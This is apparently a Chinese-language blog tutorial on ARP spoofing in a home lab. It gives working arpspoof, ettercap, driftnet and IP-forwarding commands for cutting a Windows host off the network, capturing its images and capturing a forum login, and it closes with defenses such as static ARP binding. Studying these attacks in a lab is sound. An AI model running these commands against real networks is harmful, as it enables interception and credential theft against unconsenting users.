局域網安全之ARP攻擊
參考文章:
ARP原理
ARP原理和ARP攻擊
實驗環境
攻擊方:kali 192.168.31.250
受害方:win10 192.168.31.212
準備
主機互ping
| kali ping win10 | win10 ping kali |
|---|---|
 |  |
arp -a 查看快取表資訊
| kali | win10 |
|---|---|
 |  |
1、斷網攻擊
攻擊流程
方法一:arpspoof
nmap -sP 192.168.31.*
ping掃描整個網段的主機
發現win10主機
開始攻擊:
arpspoof -i eth0 -t 192.168.31.212 192.168.31.1
發現win10已無法上網
在win10中查看arp快取表
在kali中Ctrl+C停止攻擊,發現win10恢復上網
方法二:使用工具ettercap
ettercap -G 圖形化操作
| 網關地址添加到Target1 | win10地址添加到Target2 |
|---|---|
 |  |
點擊OK開始攻擊,
查看win10的arp快取表
win10的arp快取表中,網關的MAC地址已被改為kali的,實作中間人攻擊,
2、監聽圖片瀏覽
攻擊流程
在kali開啟埠轉發功能
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
//將引數改為1,開啟埠轉發功能(效果暫時)
或者修改組態檔(效果永久)
vim /etc/sysctl.conf
開始攻擊:
arpspoof -i eth0 -t 192.168.31.212 192.168.31.1
driftnet -i eth0 開始捕獲圖片
| win10 | kali捕獲 |
|---|---|
 |  |
- 使用工具ettercap也可以,大同小異不再贅述
ettercap -i eth0 -Tq -M arp:remote //192.168.31.212// //192.168.31.1//
-i 指定網卡
-Tq 文本模式,安靜模式
-M 中間人攻擊
3、賬號密碼的獲取
一定要開啟埠轉發,開啟方法上例中有提到,
攻擊流程:
使用arpspoof開始arp欺騙
使用ettercap工具捕獲賬號密碼
win10模擬用戶登錄某論壇
回到kali查看結果
如圖已捕獲到登錄的賬號和密碼的md5值,
可能是網站有安全設定,試了好幾家如百度、京東、搜狐都沒捕獲成功,最后在某家論壇上實驗成功了,為了激動的那一刻不容易啊,哈哈哈,
防御措施
1、使用安全軟體(局域網防護,自動系結網關)
2、手動靜態系結網關的ip與MAC地址
arp -s IP MAC
3、路由器上設定IP與MAC地址系結
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/259174.html
標籤:其他
上一篇:SQL練習65:例外的郵件概率